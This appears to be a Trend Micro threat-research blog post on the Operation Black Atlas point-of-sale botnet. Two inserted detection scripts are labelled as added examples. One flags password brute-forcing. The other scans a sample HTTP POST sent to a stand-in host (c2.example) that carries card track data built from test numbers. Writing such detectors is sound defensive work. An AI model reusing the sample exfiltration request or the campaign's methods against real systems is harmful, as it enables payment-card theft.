## Operation Black Atlas Endangers In-Store Card Payments and SMBs Worldwide; Switches between BlackPOS and Other Tools

**[Posted on: December 1, 2015](http://blog.trendmicro.com/trendlabs-security-intelligence/2015/12/) at 12:31 am** | **Posted in: [Botnets](http://blog.trendmicro.com/trendlabs-security-intelligence/category/botnets/), [Malware](http://blog.trendmicro.com/trendlabs-security-intelligence/category/malware/)** | **[Author: Jay Yaneza (Threats Analyst)](http://blog.trendmicro.com/trendlabs-security-intelligence/author/jayyaneza/)**

With the coming holidays also come news of credit card breaches that endanger the data of many industries and their customers. High-profile breaches, such as that of the Hilton Hotel chain and similar establishments, were carried out with point-of-sale (PoS) malware, leading many to fear [digital threats to brick-and-mortar retailers this Thanksgiving, Black Friday, Cyber Monday, and the rest of the holiday season](http://www.darkreading.com/vulnerabilities---threats/black-friday-security-brick-and-mortar-retailers-have-cyber-threats-too/d/d-id/1323235).
Researchers also found a broad campaign that uses the modular ModPOS malware to steal payment card data from retailers in the US.

However, from what we have seen, it is not only retailers in the US that are at risk. Our researchers recently found an early version of a potentially powerful, adaptable, and stealthy botnet that seeks out PoS systems within networks. It has already extended its reach to small and medium-sized business networks all over the world, including a healthcare organization in the US. We are calling this operation Black Atlas, in reference to BlackPOS, the malware primarily used in it.

Operation Black Atlas has been active since September 2015, just in time to plant its seeds before the holiday season. Its targets include businesses in healthcare, retail, and other industries that rely on card payment systems.

The operation is run by technically sophisticated cybercriminals who are knowledgeable in a variety of penetration testing tools and have a wide network of connections to PoS malware sellers in the underground market.
Its operators built a set of tools much like a Swiss army knife, with each tool offering a different function. Malware used in Black Atlas included (but was not limited to) [variants of Alina, NewPOSThings, a Kronos backdoor, and BlackPOS](http://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/). BlackPOS, also known as Kaptoxa, was the malware used in [the Target breach in 2013 and attacks on retailers in 2014](http://money.cnn.com/2014/02/11/news/companies/retail-breach-timeline/).

[Similar to GamaPoS](http://blog.trendmicro.com/trendlabs-security-intelligence/new-gamapos-threat-spreads-in-the-us-via-andromeda-botnet/), the Black Atlas operators employed a "shotgun" approach to infiltrating networks rather than zeroing in on specific targets. They simply checked which ports were reachable from the Internet to see whether they could get in, and ended up with multiple targets around the world.
The following graph shows where these targets are located:

_Figure 1. Location of Operation Black Atlas targets_

One target even exposed the live video feed of closed-circuit television (CCTV) cameras in a gasoline station. Either this is taking reconnaissance to another real-time level or the cybercriminals simply captured whatever information was available.

### How Operation Black Atlas Works

Our analysis of the attacks against these targets gave us further insight into how the Black Atlas operators seek out PoS systems in networks.
In one particular case, which involved a healthcare organization in the US, we were able to see how the operators work.

[Similar to a targeted attack, Black Atlas involves an intelligence gathering or reconnaissance period](http://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/targeted-attacks-six-components) in which the cybercriminals use a Swiss-army-knife set of tools to work out how best to infiltrate systems. This stage relies on tools such as brute-force or dictionary attack tools, SMTP scanners, and remote desktop viewers. Networks with weak password practices are likely to fall victim at this initial probing stage. Many of these tools are easily downloaded from various sites on the Internet.

_Figure 2. Operation Black Atlas infection chain_

The cybercriminals then create a test plan based on the initial probe and use a second set of tools to execute that plan. In the case of the healthcare organization, the Black Atlas operators used remote access tools to steal more information and move laterally within the network. Which remote access tools are used at this stage depends on how the target environment is configured, and the method of gaining remote access also varies by target. Once inside, the cybercriminals familiarize themselves with the environment.
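The weak-password probing described above is also where a defender gets the first signal. The following detection script is an added example, not code from the original post or from Trend Micro, and it runs over authentication log lines constructed for the example (the one-line `AUTH_FAIL`/`AUTH_OK` format, the addresses and the account names are assumptions; Windows 4625/4624 events, RDP gateway or SMTP AUTH logs would be normalized into the same fields first). It flags a burst of failures from one source against one service, distinguishes a single-account brute force from a spray across many accounts, and raises a separate alert when a source that produced such a burst then logs in successfully, which is the case where a weak password has just fallen.

```python
"""Flag brute-force and password-spray attempts against exposed services.

Added example for this post (not Trend Micro's code). The log format is
constructed for the example: one event per line,
  <ISO-8601 UTC timestamp> AUTH_FAIL|AUTH_OK service=<svc> src=<ip> user=<name>
Real deployments would normalize Windows 4625/4624 events, RDP gateway or
SMTP AUTH logs into these same fields before calling detect().
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5            # failures from one source within WINDOW
WINDOW = timedelta(minutes=2)

# Constructed sample: an RDP brute force that succeeds, an SMTP password
# spray across several accounts, and a legitimate user who mistyped once.
SAMPLE_LOG = """\
2015-11-20T02:14:05Z AUTH_FAIL service=rdp src=203.0.113.7 user=administrator
2015-11-20T02:14:09Z AUTH_FAIL service=rdp src=203.0.113.7 user=administrator
2015-11-20T02:14:13Z AUTH_FAIL service=rdp src=203.0.113.7 user=administrator
2015-11-20T02:14:17Z AUTH_FAIL service=rdp src=203.0.113.7 user=administrator
2015-11-20T02:14:21Z AUTH_FAIL service=rdp src=203.0.113.7 user=administrator
2015-11-20T02:14:25Z AUTH_OK service=rdp src=203.0.113.7 user=administrator
2015-11-20T02:20:01Z AUTH_FAIL service=smtp src=198.51.100.9 user=sales
2015-11-20T02:20:02Z AUTH_FAIL service=smtp src=198.51.100.9 user=info
2015-11-20T02:20:03Z AUTH_FAIL service=smtp src=198.51.100.9 user=billing
2015-11-20T02:20:04Z AUTH_FAIL service=smtp src=198.51.100.9 user=support
2015-11-20T02:20:05Z AUTH_FAIL service=smtp src=198.51.100.9 user=hr
2015-11-20T02:31:40Z AUTH_FAIL service=rdp src=192.0.2.44 user=jdoe
2015-11-20T02:31:52Z AUTH_OK service=rdp src=192.0.2.44 user=jdoe
"""


def parse(line):
    """Turn one constructed log line into a dict of typed fields."""
    ts, outcome, *kv = line.split()
    fields = dict(item.split("=", 1) for item in kv)
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "ok": outcome == "AUTH_OK",
        "service": fields["service"],
        "src": fields["src"],
        "user": fields["user"],
    }


def detect(lines, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return alerts as (kind, src, service, detail) tuples, in log order."""
    alerts = []
    failures = defaultdict(deque)   # (src, service) -> deque of (ts, user)
    flagged = set()                 # keys already reported as a burst
    for ev in (parse(line) for line in lines if line.strip()):
        key = (ev["src"], ev["service"])
        q = failures[key]
        while q and ev["ts"] - q[0][0] > window:   # slide the window forward
            q.popleft()
        if ev["ok"]:
            if key in flagged:
                # A login from a source that just hammered this service:
                # treat the account as compromised, not as a user recovering.
                alerts.append(("success_after_burst", ev["src"], ev["service"],
                               "user=" + ev["user"]))
                flagged.discard(key)
            continue
        q.append((ev["ts"], ev["user"]))
        if len(q) >= threshold and key not in flagged:
            flagged.add(key)
            users = {u for _, u in q}
            kind = "password_spray" if len(users) > 1 else "brute_force"
            alerts.append((kind, ev["src"], ev["service"],
                           f"{len(q)} failures against {len(users)} account(s)"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(*alert)
```

The threshold and window are deliberately low so the sample triggers; on a real perimeter the same logic with a longer window catches the slow, scripted dictionary runs that the tools mentioned above produce, and the `success_after_burst` alert is the one worth paging on.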
What follows is the introduction of PoS threats, which the cybercriminals source from the operation's broad Swiss army knife toolbox. The favored way to introduce other tools and threats is via the built-in command-line FTP client (ftp.exe on Windows), since antimalware solutions had already blocked the initial site we reported last September that [hosted Katrina and CenterPoS](http://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/). Because that client is already present on every Windows host, the download needs no additional binary; a process-creation log that records ftp.exe command lines is one inexpensive place to look for this stage.

Black Atlas operators used the modular botnet Gorynych (also known as Diamond Fox) in some installations. Gorynych was used to download a repurposed BlackPOS variant with RAM scraping functionality and to upload all the credit card numbers dumped from memory. Since the original BlackPOS stored pilfered credit card data in a text file, Gorynych now grabs that text file and sends it with an HTTP POST to complete the data exfiltration:

_Figure 3. Gorynych data exfiltration stage_

In our next blog entry, we will discuss the steps of our investigation, how the cybercriminals retrofitted the new Gorynych backdoor to use BlackPOS, and how the whole operation puts a variety of old and new PoS malware at the cybercriminals' fingertips to easily gather financial information.
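The exfiltration step described above gives network defenders a concrete thing to look for: an outbound HTTP POST whose body is a dump file of track data. The following is an added example, not code from the original post, from Trend Micro, or from the malware; the request it inspects is constructed here (the host `c2.example`, the path `/gate/upload.php` and the User-Agent are placeholders) and contains track 1 and track 2 records in ISO/IEC 7813 layout built from publicly known test card numbers. It parses the request, matches the track formats, Luhn-checks each PAN to drop random digit runs, and reports masked PANs so the alert itself does not become another copy of the card data.

```python
"""Find payment-card track data in an HTTP POST body.

Added example for this post; not code from Trend Micro or from the malware.
The request below is constructed (placeholder host and path) and imitates
a RAM scraper's dump file being POSTed in bulk. Track layouts follow
ISO/IEC 7813; the card numbers are publicly known test PANs.
"""
import re

# Track 1: %B<PAN>^<NAME>^<YYMM><service code><discretionary data>?
TRACK1 = re.compile(r"%B(\d{13,19})\^([^^\r\n]{2,26})\^(\d{4})(\d{3})[^?\r\n]*\??")
# Track 2: ;<PAN>=<YYMM><service code><discretionary data>?
TRACK2 = re.compile(r";(\d{13,19})=(\d{4})(\d{3})[^?\r\n]*\??")

BODY = (
    "%B4111111111111111^DOE/JANE^20121010000000000?\r\n"   # track 1
    ";4111111111111111=20121010000000000?\r\n"             # track 2, same card
    ";5500000000000004=1811201000000000?\r\n"              # track 2
    ";1234567890123456=1905101?\r\n"                       # decoy: fails Luhn
    "pos01 2015-11-21 03:12:44 scan ok\r\n"                # unrelated noise
)
SAMPLE_POST = (
    "POST /gate/upload.php HTTP/1.1\r\n"
    "Host: c2.example\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)\r\n"
    "Content-Type: application/octet-stream\r\n"
    f"Content-Length: {len(BODY.encode())}\r\n"
    "\r\n" + BODY
)


def luhn_ok(pan):
    """ISO/IEC 7812 check digit; rejects most random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:                      # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask(pan):
    """Keep BIN and last four so the alert is useful but not a card dump."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for h in header_lines:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def find_track_data(text):
    """Return Luhn-valid track records found in text, with PANs masked."""
    hits = []
    for m in TRACK1.finditer(text):
        pan, name, exp, svc = m.groups()
        if luhn_ok(pan):
            hits.append({"track": 1, "pan": mask(pan), "exp": exp,
                         "service": svc, "name": name})
    for m in TRACK2.finditer(text):
        pan, exp, svc = m.groups()
        if luhn_ok(pan):
            hits.append({"track": 2, "pan": mask(pan), "exp": exp,
                         "service": svc})
    return hits


def inspect_request(raw):
    """Inspect one request; only POST bodies are scanned for track data."""
    method, path, headers, body = parse_request(raw)
    hits = find_track_data(body) if method == "POST" else []
    return {"method": method, "path": path,
            "content_type": headers.get("content-type", ""), "hits": hits}


if __name__ == "__main__":
    result = inspect_request(SAMPLE_POST)
    print(f"{result['method']} {result['path']} -> {len(result['hits'])} track record(s)")
    for hit in result["hits"]:
        print(hit)
```

In practice the same function would be fed request bodies by a proxy or IDS watching the PoS network segment, where terminals have no business originating bulk HTTP uploads at all; the Luhn check is what keeps a log of timestamps and terminal IDs, which also contain long digit runs, from producing false positives.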
We will also provide technical details, best practices, and recommendations to help IT managers and business owners avoid or remediate this PoS threat.

_With additional analysis by Erika Mendoza_

-----

### Related Posts:

- [Operation Black Atlas, Part 2: Tools and Malware Used and How to Detect Them](http://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-part-2-tools-and-malware-used-and-how-to-detect-them/)
- [One-Man PoS Malware Operation Captures 22,000 Credit Card Details in Brazil](http://blog.trendmicro.com/trendlabs-security-intelligence/fighterpos-fighting-a-new-pos-malware-family/)
- [Two New PoS Malware Affecting US SMBs](http://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/)
- [Credit Card-Scraping Kasidet Builder Leads to Spike in Detections](http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/)

**Tags:** [Botnets](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/botnets/), [SMB](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/smb/), [healthcare](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/healthcare/), [POS](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/pos/), [point-of-sale](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/point-of-sale/)